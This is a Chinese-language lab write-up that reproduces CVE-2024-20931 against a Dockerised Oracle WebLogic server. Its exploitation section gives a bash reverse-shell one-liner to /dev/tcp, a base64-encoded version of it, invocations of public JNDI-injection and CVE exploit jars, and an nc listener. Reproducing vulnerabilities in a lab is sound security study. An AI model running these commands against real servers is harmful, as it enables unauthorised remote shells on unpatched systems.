weblogic && CVE-2024-20931 [≧ ﹏ ≦复现]

漏洞编号:CVE-2024-20931

一、环境准备:

1台Windows主机(10.46.47.227)作为攻击机 | 1台centos虚拟机(192.168.172.172)作为目标机 | 虚拟机网络模式为nat

二、搭建漏洞环境

1、docker拉取镜像

1.1 docker pull ismaleiva90/weblogic12 | 我已先完成(截图丢失),大概4~5g,拉取问题:国内镜像证书失效

解决链接:https://www.cnblogs.com/digdeep/p/12236637.html

2、启动环境

2.1 docker run -dit -p 7001:7001 -p 7002:7002 --restart=always ismaleiva90/weblogic12:latest

3、访问网页

3.1 查看虚拟机ip命令:ifconfig

3.2 先在虚拟机中访问192.168.172.172:7001,加/console就是weblogic的控制页面(后半句无用)


3.3 再测试从Windows主机能否访问192.168.172.172::7001

三、利用JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar

工具链接:https://github.com/welk1n/JNDI-Injection-Exploit
(同样需要Java环境)

1、利用该工具反弹shell(需编码)

1.1 在线编码工具:https://ares-x.com/tools/runtime-exec

bash -i >& /dev/tcp/攻击机ip/攻击机端口 0>&1
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC40Ni40Ny4yMjcvNDQ0NCAwPiYx}|{base64,-d}|{bash,-i}

2、运行JNDI注入工具:java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "编 码后的反弹Shell命令" -A "攻击机IP"

四、利用CVE-2024-20931.jar工具

工具链接:https://github.com/dinosn/CVE-2024-20931

1、 下载到Windows主机中,Java环境需配置

我的为Java8

2、先检验一下漏洞

java -jar CVE-2024-20931.jar

2.1 从此图

2.2 到此图了,说明存在漏洞,就可以开启监听,nc -lvnp 4444

Windows需自行安装nc

3、此时就要用到JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar

3.1 填入10.46.47.227:1389/xgec8w

3.2 反弹监听成功


相关链接:https://mp.weixin.qq.com/s/XwQZ6BqWvU72O4XTXOlovg

热门相关:秾李夭桃   士子风流   楚汉争鼎   明朝败家子   明朝好丈夫